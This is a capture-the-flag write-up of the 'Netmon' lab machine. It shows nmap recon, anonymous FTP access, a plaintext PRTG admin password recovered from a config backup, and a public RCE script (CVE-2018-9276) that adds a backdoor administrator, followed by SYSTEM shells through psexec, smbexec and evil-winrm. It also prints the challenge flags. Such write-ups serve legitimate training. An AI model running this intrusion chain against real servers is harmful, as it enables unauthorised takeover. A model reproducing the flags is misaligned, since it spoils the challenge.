Netmon

August 8th, 2020

Netmonlogo

This is an easy windows box

Tools used

  • bash
  • evil-winrm
  • ftp
  • nmap
  • psexec
  • searchsploit
  • wget

Reconnaissance

Nmap

nmap -sC -sV -oA netmon 10.10.10.152 -v

PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7m01s, deviation: 0s, median: 7m01s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-08-04T09:25:49
|_  start_date: 2020-08-04T08:37:26

Here’s what nmap teaches us :

  • port 21 (FTP) - Anonymous login
  • port 80 (HTTP) - Indy httpd 18.1.37.13946
  • port 135 (RPC)
  • port 139 (NETBIOS)
  • port 445 (SMB) - Windows Server 2008 R2 - 2012

Since the anonymous login is open, let’s connect. To go to the FTP I used the browser :

FTP connected

I see the Users directory, browsing it, I found the user.txt flag !

FTP flag

Let’s see the web port :

Website

I need credentials to go further, I found out that the default login is “prtgadmin”, now I needed a password. Searching where the password was stored for this software, I stumble upon this reddit :

Automatically generated backups under:
	C:\ProgramData\Paessler\PRTG Network Monitor\Configuration Auto-Backups\

Automatically generated temporary files that may exist:
	C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old
	C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.nul

With the FTP connection I found those files.

Config file prtg

I download all the configuration files but the interesting one is this one :

wget "ftp://10.10.10.152/ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.old.bak"

strings "PRTG Configuration.old.bak" | grep -i prtgadmin -C 1
            <dbpassword>
              <!-- User: prtgadmin -->
              PrTg@dmin2018
              
                <login>
                  prtgadmin
                </login>

I now have credentials :

login : prtgadmin
password : PrTg@dmin2018

I tried to connect to the website with those credentials, but it didn’t works !

Exploit

Then I remember that the box was release in 2019, so I change the password by “PrTg@dmin2019” and it works.

Website connected

Now that I’m connected, let’s see if there is known exploits :

Searchsploit prtg

There is an authenticated RCE, download the exploit :

searchsploit -m windows/webapps/46527.sh

Then run it with the rights parameters :

bash 46527.sh -u http://10.10.10.152 -c "OCTOPUS1813713946=ezRGMjU3MzU5LTJCNDMtNEYzOC05M0EyLUIwNzc4ODQxMzFGOH0="

[+]#########################################################################[+] 
[*] PRTG RCE script by M4LV0                                                [*] 
[+]#########################################################################[+] 
[*] https://github.com/M4LV0                                                [*] 
[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution  CVE-2018-9276 [*] 
[+]#########################################################################[+] 

 [*] file created 
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st' 
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group 
 [*] sending notification wait....

 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!

Now that the exploit completed, I have user and a password to connect with.

smbexec.py 'pentest:P3nT3st!@10.10.10.152' 
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

or

psexec.py 'pentest:P3nT3st!@10.10.10.152'
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file kDxiGmrG.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service zAqT on 10.10.10.152.....
[*] Starting service zAqT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

or

evil-winrm -i 10.10.10.152 -u "pentest" -p 'P3nT3st!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\pentest\Documents> whoami
netmon\pentest

I can now read the root flag !

Flags

User.txt

dd58ce67b49e15105e88096c8d9255a5

Root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
3018977fb944bf1878f75b879fba67cc